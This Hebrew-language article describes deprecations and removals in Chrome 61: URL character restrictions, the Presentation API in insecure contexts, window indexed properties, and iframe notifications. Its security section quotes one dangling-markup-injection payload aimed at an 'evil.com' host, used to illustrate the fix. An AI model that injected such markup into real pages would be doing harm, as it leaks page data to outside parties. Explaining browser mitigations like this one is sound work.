כמעט בכל גרסה של Chrome ניתן לראות מספר משמעותי של עדכונים ושיפורים למוצר, לביצועים שלו וליכולות של פלטפורמת האינטרנט. במאמר הזה נתאר את ההוצאה משימוש וההסרות ב-Chrome 61, שנמצא בגרסת בטא נכון ל-3 באוגוסט. הרשימה הזו עשויה להשתנות בכל עת.
אבטחה ופרטיות
חסימת משאבים שכתובות ה-URL שלהם מכילות את התווים '\n' ו-'<'
יש סוג של האקינג שנקרא החדרת תגי עיצוב תלויות שבו כתובת URL קטועה משמשת לשליחת נתונים לנקודת קצה חיצונית. לדוגמה, ניקח לדוגמה דף שמכיל <img src='https://evil.com/?
. מאחר שבכתובת ה-URL אין תו סגירה, הדפדפנים יקראו את הציטוט הבא ויתייחסו
לתווים שכאן כאילו מדובר בכתובת URL אחת.
Chrome 61 מצמצם את נקודת החולשה הזו על ידי הגבלה של מערכות התווים
שמותרות במאפיינים href
ו-src
. באופן ספציפי, Chrome יפסיק לעבד כתובות אתרים כאשר הוא ייתקל בתווי שורה חדשים (\n
) ובפחות מ- תווים (<
).
במקום זאת, מפתחים שיש להם תרחיש לגיטימי לדוגמה בשורה חדשה ופחות מ- תווים בכתובת ה-URL צריכים לסמן את התווים האלה בתו בריחה (escape).
כוונה להסיר | מעקב אחר הסטטוס של Chrome | באג ב-Chromium
הוצאה משימוש והסרה של presentation API בהקשרים לא מאובטחים
גילינו שבמקורות לא מאובטחים, ניתן להשתמש ב-presentation API בתור וקטור פריצה במקורות לא מאובטחים. מכיוון שאין במסכים האלה סרגלי כתובת, אפשר להשתמש ב-API כדי לזייף תוכן. יש אפשרות גם לזליגת נתונים בזמן הרצת המצגת.
בהתאם לכוונתה של Blink להסיר תכונות חזקות במקורות לא מאובטחים, אנחנו מתכננים להוציא משימוש את התמיכה ב-presentation API בהקשרים לא מאובטחים. החל מ-Chrome
61, PresentationRequest.start()
לא יפעל יותר במקורות לא מאובטחים.
כוונה להסיר | מעקב אחר הסטטוס של Chrome | באג ב-Chromium
JavaScript
לא לאפשר הגדרה של מאפיינים שנוספו לאינדקס בחלונות
בעבר, דפדפנים מסוימים אפשרו לבצע הקצאות JavaScript, כגון:
window[0] = 1;
במפרט ה-HTML הנוכחי מצוין שזוהי הפרה מפורשת של מפרט JavaScript, ולכן האפשרות הזו תוסר ב-Chrome 61. החל מפברואר 2016, Firefox כבר מציית למדיניות.
הסרת השימוש בהתראות ממסגרות iframe לא מאובטחות
בקשות להרשאות ממסגרות iframe עלולות לבלבל את המשתמשים, כי קשה להבחין בין המקור של הדף שמכיל לבין המקור של ה-iframe ששולח את הבקשה. כשהיקף הבקשות לא ברור, למשתמשים קשה יותר להחליט אם לאשר או לדחות אותן.
חסימת ההתראות במסגרות iframe גם תתאים בין הדרישות של הרשאת ההתראות לבין הדרישות של התראות, וכך תקל על המפתחים.
מפתחים שזקוקים לפונקציונליות הזו יכולים לפתוח חלון חדש כדי לבקש הרשאה לשליחת התראות.